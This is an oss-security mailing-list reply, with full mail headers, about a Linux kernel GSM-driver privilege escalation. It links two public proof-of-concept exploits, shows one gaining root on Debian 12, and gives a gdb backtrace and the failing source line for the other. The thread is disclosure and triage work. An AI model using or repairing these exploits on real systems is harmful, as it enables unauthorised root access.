Received: by 2002:ab2:1347:0:b0:1f4:ac9d:b246 with SMTP id g7csp416672lqg;
        Thu, 11 Apr 2024 07:01:41 -0700 (PDT)
X-Forwarded-Encrypted: i=2; AJvYcCXsdVMbH5SSZLgbfueL0Wwqo5dfIEIlszqLI+YYA97eCQLUMRMZrr2NorQ5NRrbIUxfgw4SqPy+O8oQc55KWFrMFlBkRGPg5XPFm3Yd5Q==
X-Google-Smtp-Source: AGHT+IFGkdsbr9250hX5ACLYvi26hjUvNtBn41wbLFv01lOwq5l1lzeLBM2hjmOtL8Q+U8X8DwdQ
X-Received: by 2002:a05:622a:1a26:b0:434:a47a:f6cb with SMTP id f38-20020a05622a1a2600b00434a47af6cbmr7362897qtb.24.1712844100956;
        Thu, 11 Apr 2024 07:01:40 -0700 (PDT)
ARC-Seal: i=1; a=rsa-sha256; t=1712844100; cv=none;
        d=google.com; s=arc-20160816;
        b=yLAe4Wqhprqx5h3RgED26WCjg3zp4VckKGiUdxfxqmmftGYRXA0vSIbxrsYRtlzNAd
         tEVMuiNEUVWQR1Tz1DIaV4siSPNHqaC+yUeiTaMzoQWROT6gFWZE/6pppPgiuLH9+TbT
         2A3+5jtFVLgHH28vhXh8CoGi2wqvDxD3+U9ta5iwK5Cy1nMH2gob5YUlrxqDOT+BQ5gj
         4IhP1er6A4qmMwqVB8eJMkJcQHrzAyuBNVG+ZuPRZhK43U6rO5OSK7EN3e6RaNQCBQuU
         JOipv0L1ySMT+yzMdEP18oPaifF5gFrPyb7/72ke1WQkuZO0pw7VE7rdMESxFUB2Ipo+
         yk0w==
ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20160816;
        h=subject:content-transfer-encoding:in-reply-to:autocrypt:references
         :to:from:user-agent:mime-version:date:message-id:delivered-to
         :delivered-to:reply-to:list-id:list-subscribe:list-unsubscribe
         :list-help:list-post:precedence:mailing-list;
        bh=I1BI64S2VRQO+RcYRpcFb8u0r7o1GDW1blghvn1ffhk=;
        fh=9jsPTyo6edd9xvAeG+KFFrRrXMmgB/RdwUKOrvy9dcA=;
        b=oa7vdqZifvsLs+JLhjcQrr58rc3uCRiLu/NjVY/q1oUp4f9qTLECzMFovLxA+j8qNL
         XSwEaxzsRTyhvW1H/t5VaJihuD6rLRp3Ef+egNrvBEHwxKLky459Fy6EafP2EznGJcNb
         zipbBl8QYV5KgZYXQ3htS2gS3XTF5OHC0L1LIUm3UFxQIwfaL9buarg9xw9boUzC10yl
         YRfFoT0IKbcKhP66TK11cYc3qUNxvC5VfUoVeteV8TW0mb2JVf1KbUK2Nj45xsKs6mR5
         9lK4ESM6y1gUYB57kXG/at+gw6UmKO1AbcTsdRxVo0uj2KznuaIHDXIgr143pDgHEDAg
         Zg3Q==;
        dara=google.com
ARC-Authentication-Results: i=1; mx.google.com;
       spf=pass (google.com: domain of oss-security-return-30004-linux.lists.archive=gmail.com@lists.openwall.com designates 193.110.157.125 as permitted sender) smtp.mailfrom="oss-security-return-30004-linux.lists.archive=gmail.com@lists.openwall.com"
Return-Path: <oss-security-return-30004-linux.lists.archive=gmail.com@lists.openwall.com>
Received: from second.openwall.net (second.openwall.net. [193.110.157.125])
        by mx.google.com with SMTP id c19-20020ac87dd3000000b00436585672dcsi1615796qte.736.2024.04.11.07.01.40
        for <linux.lists.archive@gmail.com>;
        Thu, 11 Apr 2024 07:01:40 -0700 (PDT)
Received-SPF: pass (google.com: domain of oss-security-return-30004-linux.lists.archive=gmail.com@lists.openwall.com designates 193.110.157.125 as permitted sender) client-ip=193.110.157.125;
Authentication-Results: mx.google.com;
       spf=pass (google.com: domain of oss-security-return-30004-linux.lists.archive=gmail.com@lists.openwall.com designates 193.110.157.125 as permitted sender) smtp.mailfrom="oss-security-return-30004-linux.lists.archive=gmail.com@lists.openwall.com"
Received: (qmail 29788 invoked by uid 550); 11 Apr 2024 13:44:20 -0000
Mailing-List: contact oss-security-help@lists.openwall.com; run by ezmlm
Precedence: bulk
List-Post: <mailto:oss-security@lists.openwall.com>
List-Help: <mailto:oss-security-help@lists.openwall.com>
List-Unsubscribe: <mailto:oss-security-unsubscribe@lists.openwall.com>
List-Subscribe: <mailto:oss-security-subscribe@lists.openwall.com>
List-ID: <oss-security.lists.openwall.com>
Reply-To: oss-security@lists.openwall.com
Delivered-To: mailing list oss-security@lists.openwall.com
Delivered-To: moderator for oss-security@lists.openwall.com
Received: (qmail 27701 invoked from network); 11 Apr 2024 08:33:09 -0000
Authentication-Results: mail.absynth.de;
	auth=pass smtp.auth=info@christopher-kunz.de smtp.mailfrom=info@christopher-kunz.de
Message-ID: <b701b525-0c42-4b3a-a1a3-0ea68e864fbe@christopher-kunz.de>
Date: Thu, 11 Apr 2024 10:32:59 +0200
MIME-Version: 1.0
User-Agent: Mozilla Thunderbird
From: "Dr. Christopher Kunz" <info@christopher-kunz.de>
To: oss-security@lists.openwall.com
References: <607d5716-128f-44c5-ab52-6dde4ca6e8a4@christopher-kunz.de>
Autocrypt: addr=info@christopher-kunz.de; keydata=
 xsDiBD3U55kRBADKaqmPY/RBZ0luAFvOsa2lqQN8qXEimlCrbe0+WWywWDYNO/0c5B1FhUt2
 heF12OV9u1ldDdynB/awdV3NYaoizce86XQzQGcPpIOlEgI9iTTc1FSP9zDkkljLMrMB8WGK
 Q8WH6yLT+BOTIoK/rMs9DEN0hcsxOZY1wTEzhOfewwCg/7fHkook6P1/O/iOG3k/r90Um98D
 /AvzlFtPaRn5qiCWjeopDW1RAJNLvWwKs1HHv8m1UOtMNisqObD3SuHn9lp4FfGAu7gaJoqI
 /l6Rk02dgmBq+gyV+qg8PYXMlhh0xEfEO/TPPjx+nZnDRvO59tOj0pg2GLpIvQtdlwow1Iq4
 r2XfHUk1b827GZGAg1+ckkkNSG24A/9l238stiojp+GYwpuYkGrxROSYX+0slzRc40DHjtrb
 Jidz2Usmilyvt5WA1iBmAKw3L2TLQKpLtxAkGWSrDfdnl38VrYGMEM6WVctY6TxrqzrQLhaw
 W+17goNN73S3uP3C0YrdVjZc5jl0xlfli4zP7HmxL1YyRlLQ22aVcdDmS80rQ2hyaXN0b3Bo
 ZXIgS3VueiA8aW5mb0BjaHJpc3RvcGhlci1rdW56LmRlPsJ4BBMRAgA4AhsDBgsJCAcDAgMV
 AgMDFgIBAh4BAheAFiEEyIKO0X3RkBHAiOpQXPou6zl6ysEFAmWdKLICGQEACgkQXPou6zl6
 ysEHsQCfeqMRH0HyzVzl6XyNrxXdi0kSacYAnjXCcViWthCxB04fgluoiFw7b02TzsFNBD3U
 55kQCAD2Qle3CH8IF3KiutapQvMF6PlTETlPtvFuuUs4INoBp1ajFOmPQFXz0AfGy0OplK33
 TGSGSfgMg71l6RfUodNQ+PVZX9x2Uk89PY3bzpnhV5JZzf24rnRPxfx2vIPFRzBhznzJZv8V
 +bv9kV7HAarTW56NoKVyOtQa8L9GAFgr5fSI/VhOSdvNILSd5JEHNmszbDgNRR0PfIizHHxb
 LY7288kjwEPwpVsYjY67VYy4XTjTNP18F1dDox0YbN4zISy1Kv884bEpQBgRjXyEpwpy1obE
 AxnIByl6ypUM2Zafq9AKUJsCRtMIPWakXUGfnHy9iUsiGSa6q6Jew1XpMgs7AAICB/97dSwj
 NNOvwX1CYynQFaXrajIBF9fSZcOJNZ5vh/+ejkl2nobkQicbI97dKYttanBaF4O//lPjNcbO
 iXkiqEI8FQPyp5I+KIkVy6MiNM09zd0qHVwlihok2JG5wSGXfUsXjk3iPsxIVhWZSrB2q0By
 Av95xcvUtxQl5cCGGqTxBIsGjiN4wkDS0FNXFH2hOuH5pCl+cbDdZmYTc1O+aeSygvLN76gs
 tBgDODp8p2Fiu7RL99SRLTIHdniSvOr/bm4BDRYY0D6P/MoZQydZPMmZAOv3qnOkPox/9e5/
 zP8cmLm08gbez8wjfl6Rl5OjngTIatupEWXZK022C2+LJBeFwkwEGBECAAwFAj3U55kFGwwA
 AAAACgkQXPou6zl6ysHXxgCgw8C3Y9WTlhK6j3KgyciAF6X+odsAnja8RhnAa3HRM8YZbeaW
 DC6HBdDe
In-Reply-To: <607d5716-128f-44c5-ab52-6dde4ca6e8a4@christopher-kunz.de>
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 8bit
Subject: Re: [oss-security] New Linux LPE via GSMIOC_SETCONF_DLCI?

FWIW,

on a freshly installed and fully updated default Debian 12 VM (from the 
current netinst iso), the first two exploits yield different results.

> PoC and writeup are here: 
> https://github.com/YuriiCrimson/ExploitGSM/tree/main

This, let's call it "Yurii's version", works as advertised:

$ ./ExploitGSM debian
kallsyms restricted, begin retvial kallsyms table
detected kernel path-> /boot/vmlinuz-6.1.0-18-amd64
detected compressed format -> xz
Uncompressed kernel size -> 65902908
successfully taken kernel!
begin try leak startup_xen!
startup_xen leaked address  -> ffffffff8c86f1c0
text leaked address         -> ffffffff8a800000
lockdep_map_size     -> 32
spinlock_t_size      -> 4
mutex_size           -> 32
gsm_mux_event_offset -> 56
Let go thread
We get root, spawn shell
root@debianexploitgsm:/root# id
uid=0(root) gid=0(root) groups=0(root)


> PoC: 
> https://github.com/jmpe4x/GSM_Linux_Kernel_LPE_Nday_Exploit/tree/main 

This one, however, segfaults. I recompiled it with debugging symbols and 
ran it through a quick gdb:

Reading symbols from ./ExploitGSM...
(gdb) run debian
Starting program: 
/home/absynth/GSM_Linux_Kernel_LPE_Nday_Exploit/ExploitGSM debian
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x00000000004324f7 in __strcmp_avx2 ()
(gdb) bt
#0  0x00000000004324f7 in __strcmp_avx2 ()
#1  0x0000000000401b5e in main (argc=2, argv=0x7fffffffe3f8) at 
/home/absynth/GSM_Linux_Kernel_LPE_Nday_Exploit/main.c:552
(gdb)

Line 552 is the kernel release check, so a fairly straightforward piece 
of code:

         if (strcmp(iter_kernel->os_name, argv[1]) || 
strcmp(iter_kernel->kernel, kernel_info.release))

I'm not a C developer, so I'm not too sure what goes wrong here, but I 
guess it's a simple fix.

With regards to Yurii's PoC, I'd say that this can indeed be classified 
as a working 0day LPE in the default configuration.

We don't have a CVE for this yet, do we?

Regards,

--cku